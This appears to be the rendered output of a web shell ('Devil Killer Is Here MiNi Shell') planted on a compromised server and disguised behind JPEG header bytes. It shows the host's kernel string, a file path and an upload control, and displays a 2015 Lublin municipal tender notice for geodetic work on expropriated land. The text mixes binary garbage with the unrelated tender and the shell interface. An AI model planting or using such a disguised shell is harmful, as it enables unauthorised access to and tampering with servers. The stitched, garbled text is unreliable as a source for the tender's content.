JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151012/270020-N-2015.html

<p class="kh_header"><b>Lublin: Opracowanie dokumentacji geodezyjnej do zwrotu nieruchomości położonych w Lublinie - IV części.</b><br>
<b>Numer ogłoszenia: 270020 - 2015; data zamieszczenia: 12.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lublin , Pl. Króla Władysława Łokietka 1, 20-109 Lublin, woj. lubelskie, tel. 81 4663000, faks 81 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lublin.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji geodezyjnej do zwrotu nieruchomości położonych w Lublinie - IV części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Część I - Opracowanie dokumentacji geodezyjnej, na tle istniejącej ewidencji gruntów,  nieruchomości oznaczonej uprzednio jako działka nr 14/2 o pow. 0,2011 ha, wywłaszczonej decyzją Urzędu Miejskiego w Lublinie z dnia 16 stycznia 1976 r. znak: GK.IV-6602/53/75, wchodzącej aktualnie w obszar działek ewidencyjnych:
- nr 39/9 (obr. 25, ark. 2), położonej w Lublinie przy ul. Wojciechowskiej 42c
- nr 39/10 (obr. 25, ark. 2), położonej w Lublinie przy ul. Wojciechowskiej 42, 
dla których Sąd Rejonowy Lublin - Zachód w Lublinie X Wydział Ksiąg Wieczystych prowadzi księgę wieczystą LU1I/00333965/3 - na potrzeby postępowania o zwrot wywłaszczonej nieruchomości.
1.1. Niniejszą dokumentację geodezyjno - prawną należy opracować w 3 egzemplarzach.
1.1.1. Zakres zamówienia w części I obejmuje:
etap I
1) zgłoszenie prac geodezyjnych w Miejskim Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Lublinie,
2) zebranie i analizę materiałów źródłowych,
3) badanie księgi wieczystej działek, których częścią jest działka wywłaszczona,
4) aktualizację mapy zasadniczej w zakresie instrukcji technicznej K-1 (dotyczy        działki wywłaszczonej),
5) naniesienie na kserokopię mapy zasadniczej stanu użytkowania, 
6) opracowanie i zaewidencjonowanie w MODGiK w Lublinie mapy ze szczegółowym rozliczeniem działki wywłaszczonej w nawiązaniu do istniejącej ewidencji gruntów oraz w odniesieniu do stanu zagospodarowania terenu, 
7) przeprowadzenie, na wezwanie Zamawiającego, oględzin nieruchomości, w celu okazania granic wywłaszczonego gruntu i projektowanych w dokumentacji geodezyjno - prawnej działek.
etap II
W przypadku przedłużającego się postępowania o zwrot wywłaszczonej nieruchomości, Wykonawca po otrzymaniu od Zamawiającego pisemnego zlecenia zobowiązany jest do zaktualizowania wykonanej dokumentacji geodezyjnej stosownie do obowiązującej w tym okresie ewidencji gruntów oraz wykonania innych wersji dokumentacji do zwrotu nieruchomości w przypadku zaistnienia takiej potrzeby.
etap III
W przypadku wydania ostatecznej decyzji o zwrocie wywłaszczonej nieruchomości, Wykonawca, po otrzymaniu od Zamawiającego pisemnego zlecenia:
1) wykona opracowanie mapy będącej podstawą do ujawnienia w ewidencji gruntów oraz w księdze wieczystej dokonanego zwrotu działki, po zaewidencjonowaniu opracowania zgodnie z pkt 6 I etapu,  
2) wprowadzi zmiany na mapie zasadniczej w związku ze zwrotem działki, 
3) wykona utrwalenie oraz okazanie punktów granicznych zwróconej działki byłym właścicielom ze spisaniem protokołu okazania. 
2. Część II - Opracowanie dokumentacji geodezyjnej, na tle istniejącej ewidencji gruntów, nieruchomości oznaczonej uprzednio jako działka nr 14/6 o pow. 0,0807 ha, wywłaszczonej decyzją Urzędu Miejskiego w Lublinie z dnia 16 stycznia 1976 r. znak: GK.IV-6602/53/75,w części o pow. 0,0789 ha wchodzącej aktualnie w obszar działki ewidencyjnej nr 39/9 (obr. 25, ark. 2), położonej w Lublinie przy ul. Wojciechowskiej 42c, dla której Sąd Rejonowy Lublin - Zachód w Lublinie X Wydział Ksiąg Wieczystych prowadzi księgę wieczystą LU1I/00333965/3 - na potrzeby postępowania o zwrot wywłaszczonej nieruchomości.
2.1.Niniejszą dokumentację geodezyjno - prawną należy opracować w 3 egzemplarzach.
2.1.1. Zakres zamówienia w części II obejmuje:
etap I
1) zgłoszenie prac geodezyjnych w Miejskim Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Lublinie,
2) zebranie i analizę materiałów źródłowych,
3) badanie księgi wieczystej działek, których częścią jest działka wywłaszczona,
4) aktualizację mapy zasadniczej w zakresie instrukcji technicznej K-1 (dotyczy działki wywłaszczonej),
5) naniesienie na kserokopię mapy zasadniczej stanu użytkowania, 
6) opracowanie i zaewidencjonowanie w MODGiK w Lublinie mapy ze szczegółowym rozliczeniem działki wywłaszczonej w nawiązaniu do istniejącej ewidencji gruntów oraz w odniesieniu do stanu zagospodarowania terenu, 
7) przeprowadzenie, na wezwanie Zamawiającego, oględzin nieruchomości, w celu okazania granic wywłaszczonego gruntu i projektowanych w dokumentacji geodezyjno - prawnej działek.
etap II
W przypadku przedłużającego się postępowania o zwrot wywłaszczonej nieruchomości, Wykonawca po otrzymaniu od Zamawiającego pisemnego zlecenia zobowiązany jest do zaktualizowania wykonanej dokumentacji geodezyjnej stosownie do obowiązującej w tym okresie ewidencji gruntów oraz wykonania innych wersji dokumentacji do zwrotu nieruchomości w przypadku zaistnienia takiej potrzeby.
etap III
W przypadku wydania ostatecznej decyzji o zwrocie wywłaszczonej nieruchomości, Wykonawca, po otrzymaniu od Zamawiającego pisemnego zlecenia:
1) wykona opracowanie mapy będącej podstawą do ujawnienia w ewidencji gruntów oraz w księdze wieczystej dokonanego zwrotu działki, po zaewidencjonowaniu opracowania zgodnie z pkt 6 I etapu,  
2) wprowadzi zmiany na mapie zasadniczej w związku ze zwrotem działki, 
3) wykona utrwalenie oraz okazanie punktów granicznych zwróconej działki byłym właścicielom ze spisaniem protokołu okazania. 
3. Część III - Opracowanie dokumentacji geodezyjnej, na tle istniejącej ewidencji gruntów, nieruchomości oznaczonej uprzednio jako działki o nr 76/3, 92/2, 24 i 37 o łącznej powierzchni 3296 m2, wywłaszczonej na rzecz Skarbu Państwa decyzją Urzędu Miejskiego w Lublinie z dnia 20 grudnia 1974 r. znak: GK.IV.6602/81/74, obecnie wchodzącej w skład działek ewidencyjnych:
- nr 225/30 (obr. 11, ark. 2), położonej w Lublinie przy ul. Dobrzańskiego 3, dla której Sąd Rejonowy Lublin - Wschód w Lublinie z siedzibą w Świdniku V Wydział Ksiąg Wieczystych prowadzi księgę wieczystą nr LU1I/00312928/9,
- nr 225/1 (obr. 11, ark. 2), położonej w Lublinie przy ul. Dobrzańskiego
i ul. Dekutowskiego, dla której Sąd Rejonowy Lublin - Zachód w Lublinie X Wydział prowadzi księgę wieczystą nr LU1I/00312533/3,
- nr 49/3 (obr. 11, ark. 3), położonej w Lublinie przy Al. Wincentego Witosa 17
i ul. Doświadczalnej 42, dla której Sąd  Rejonowy Lublin - Wschód w Lublinie
z siedzibą w Świdniku V Wydział Ksiąg Wieczystych prowadzi księgę wieczystą
nr LU1I/00194324/1,
na potrzeby postępowania o zwrot wywłaszczonej nieruchomości.
3.1.Niniejszą dokumentację geodezyjno - prawną należy opracować w 3 egzemplarzach.
3.1.1. Zakres zamówienia w części III obejmuje:
etap I
1) zgłoszenie prac geodezyjnych w Miejskim Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Lublinie,
2) zebranie i analizę materiałów źródłowych,
3) badanie księgi wieczystej działek, których częścią jest działka wywłaszczona,
4) aktualizację mapy zasadniczej w zakresie instrukcji technicznej K-1 (dotyczy działki wywłaszczonej),
5) naniesienie na kserokopię mapy zasadniczej stanu użytkowania, 
6) opracowanie i zaewidencjonowanie w MODGiK w Lublinie mapy ze szczegółowym rozliczeniem działki wywłaszczonej w nawiązaniu do istniejącej ewidencji gruntów oraz w odniesieniu do stanu zagospodarowania terenu, 
7) przeprowadzenie, na wezwanie Zamawiającego, oględzin nieruchomości, w celu okazania granic wywłaszczonego gruntu i projektowanych w dokumentacji geodezyjno - prawnej działek.
etap II
W przypadku przedłużającego się postępowania o zwrot wywłaszczonej nieruchomości, Wykonawca po otrzymaniu od Zamawiającego pisemnego zlecenia zobowiązany jest do zaktualizowania wykonanej dokumentacji geodezyjnej stosownie do obowiązującej w tym okresie ewidencji gruntów oraz wykonania innych wersji dokumentacji do zwrotu nieruchomości w przypadku zaistnienia takiej potrzeby.
etap III
W przypadku wydania ostatecznej decyzji o zwrocie wywłaszczonej nieruchomości, Wykonawca, po otrzymaniu od Zamawiającego pisemnego zlecenia:
1) wykona opracowanie mapy będącej podstawą do ujawnienia w ewidencji gruntów oraz w księdze wieczystej dokonanego zwrotu działki, po zaewidencjonowaniu opracowania zgodnie z pkt 6 I etapu,  
 2) wprowadzi zmiany na mapie zasadniczej w związku ze zwrotem działki, 
3) wykona utrwalenie oraz okazanie punktów granicznych zwróconej działki byłym właścicielom ze spisaniem protokołu okazania. 
4. Część IV -  Opracowanie dokumentacji geodezyjnej, na tle istniejącej ewidencji gruntów, nieruchomości oznaczonej uprzednio jako działki o nr 76/1, 76/2, 76/3, 92/1 i 92/2 o łącznej powierzchni 2647 m2, wywłaszczonej na rzecz Skarbu Państwa decyzją Urzędu Miejskiego w Lublinie z dnia 17 maja 1977 r. znak: GTO.VII.6602/67/76, obecnie wchodzącej w skład działek ewidencyjnych:
nr 223/1 (obr. 11, ark. 2), położonej w Lublinie przy ul. Droga Męczenników
Majdanka 74b, dla której Sąd  Rejonowy Lublin - Wschód w Lublinie z siedzibą
w Świdniku V Wydział Ksiąg Wieczystych prowadzi księgę wieczystą
nr LU1I/00182252/8,
nr 227/3 (obr. 11, ark. 2), położonej w Lublinie przy ul. Dekutowskiego, dla której Sąd Rejonowy Lublin - Zachód w Lublinie X Wydział prowadzi księgę wieczystą
nr LU1I/00312533/3,
nr 225/30 (obr. 11, ark. 2), położonej w Lublinie przy ul. Dobrzańskiego 3, dla której Sąd Rejonowy Lublin - Wschód w Lublinie z siedzibą w Świdniku V Wydział Ksiąg Wieczystych prowadzi księgę wieczystą nr LU1I/00312928/9,
nr 225/1 (obr. 11, ark. 2), położonej w Lublinie przy ul. Dobrzańskiego
i ul. Dekutowskiego, dla której Sąd Rejonowy Lublin - Zachód w Lublinie X Wydział prowadzi księgę wieczystą nr LU1I/00312533/3,
na potrzeby postępowania o zwrot wywłaszczonej nieruchomości.
4.1. Niniejszą dokumentację geodezyjno - prawną należy opracować w 3 egzemplarzach.
4.1.1.Zakres zamówienia w części IV obejmuje:
etap I
1) zgłoszenie prac geodezyjnych w Miejskim Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Lublinie,
2) zebranie i analizę materiałów źródłowych,
3) badanie księgi wieczystej działek, których częścią jest działka wywłaszczona,
4) aktualizację mapy zasadniczej w zakresie instrukcji technicznej K-1 (dotyczy działki wywłaszczonej),
5) naniesienie na kserokopię mapy zasadniczej stanu użytkowania, 
6) opracowanie i zaewidencjonowanie w MODGiK w Lublinie mapy ze szczegółowym rozliczeniem działki wywłaszczonej w nawiązaniu do istniejącej ewidencji gruntów oraz w odniesieniu do stanu zagospodarowania terenu, 
7) przeprowadzenie, na wezwanie Zamawiającego, oględzin nieruchomości, w celu okazania granic wywłaszczonego gruntu i projektowanych w dokumentacji geodezyjno - prawnej działek.
etap II
W przypadku przedłużającego się postępowania o zwrot wywłaszczonej nieruchomości, Wykonawca po otrzymaniu od Zamawiającego pisemnego zlecenia zobowiązany jest do zaktualizowania wykonanej dokumentacji geodezyjnej stosownie do obowiązującej w tym okresie ewidencji gruntów oraz wykonania innych wersji dokumentacji do zwrotu nieruchomości w przypadku zaistnienia takiej potrzeby.
etap III
W przypadku wydania ostatecznej decyzji o zwrocie wywłaszczonej nieruchomości, Wykonawca, po otrzymaniu od Zamawiającego pisemnego zlecenia:
1) wykona opracowanie mapy będącej podstawą do ujawnienia w ewidencji gruntów oraz w księdze wieczystej dokonanego zwrotu działki, po zaewidencjonowaniu opracowania zgodnie z pkt 6 I etapu,  
2) wprowadzi zmiany na mapie zasadniczej w związku ze zwrotem działki, 
3) wykona utrwalenie oraz okazanie punktów granicznych zwróconej działki byłym właścicielom ze spisaniem protokołu okazania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.43.00-7, 79.13.10.00-1, 71.35.40.00-4, 71.25.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie osobą/ami posiadającymi/ą odpowiednie uprawnienia zawodowe (świadectwa) w dziedzinie geodezji i kartografii nadane przez Głównego Geodetę Kraju w zakresie określonym w art. 43 pkt 1 oraz pkt 2 ustawy z dnia 17 maja 1989 roku Prawo Geodezyjne i Kartograficzne (Dz. U. z 2015 r. poz. 520 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 
2.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej).
3.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba, której  umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.4.Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują następujące rodzaje i warunki zmian wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmian:
a)kwoty podatku VAT oraz wynagrodzenia brutto,
b)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie
art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu o pracę (Dz. U. Nr 200, poz. 1679, z 2004 r. Nr 240, poz. 2407 oraz z 2005 r. Nr 157, poz. 1314),
c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokość stawki składki na ubezpieczenia społeczne lub zdrowotne,
2. Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujących warunkach:
Ad a) kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do powszechnie obowiązujących przepisów prawa wprowadzających zmianę stawki podatku VAT.,
Ad b) wynagrodzenie ulegnie zmianie odpowiednio do zmiany wysokości kosztów pracy ponoszonych przez Wykonawcę w związku z realizacją przedmiotowego zamówienia, o ile zmiana kosztów pracy wynika ze zmiany przepisów prawa dot. wysokości minimalnego wynagrodzenia za pracę. Wprowadzenie przedmiotowej zmiany kwot wynagrodzenia  możliwe będzie jeżeli Wykonawca:
- udowodni, że zmiana ww. przepisów będzie miała wpływ na koszty wykonania poszczególnych etapów przedmiotu umowy przez Wykonawcę,
- wykaże jaką część ceny stanowią koszty pracy ponoszone przez Wykonawcę w trakcie realizacji zamówienia oraz jak zmiana przepisów wpłynie na wysokość tych kosztów.
Zamawiający zastrzega sobie prawo do wniesienia zastrzeżeń dotyczących wysokości kosztów pracy przedstawionych przez Wykonawcę. W szczególności Wykonawca będzie zobowiązany do przedstawienia na żądanie Zamawiającego kalkulacji kosztów składających się na wynagrodzenie za wykonanie danego etapu przedmiotu umowy wraz z dowodami potwierdzającymi ponoszenie poszczególnych rodzajów kosztów przez Wykonawcę.
Ad c) wynagrodzenie ulegnie zmianie odpowiednio do zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Poszczególne kwoty wynagrodzenia ulegną zmianie odpowiednio do zmiany wysokości kosztów ponoszonych przez Wykonawce w związku z realizacją przedmiotowego zamówienia, o ile zmiana tych kosztów wynika ze zmiany przepisów prawa dot. zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
Wprowadzenie przedmiotowej zmiany możliwe będzie jeżeli Wykonawca:
- udowodni, że zmiana ww. przepisów będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę,
- wykaże jaką część ceny stanowią koszty pracy ponoszone przez Wykonawcę w trakcie realizacji zamówienia oraz jak zmiana przepisów wpłynie na wysokość tych kosztów.
Zamawiający zastrzega sobie prawo do wniesienia zastrzeżeń dotyczących wysokości kosztów pracy przedstawionych przez Wykonawcę. W szczególności Wykonawca będzie zobowiązany do przedstawienia na żądanie Zamawiającego kalkulacji kosztów składających się na wynagrodzenie za wykonanie danego etapu przedmiotu umowy wraz z dowodami potwierdzającymi ponoszenie poszczególnych rodzajów kosztów przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Plac Litewski 1, pokój nr 3, po dokonaniu wpłaty 5,00 zł w kasie UM Lublin, ul. Wieniawska 14 lub za zaliczeniem pocztowym (5,00 zł + koszt przesyłki)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2015 godzina 09:30, miejsce: Biuro Zamówień Publicznych UM Lublin, Plac Litewski 1, pokój nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




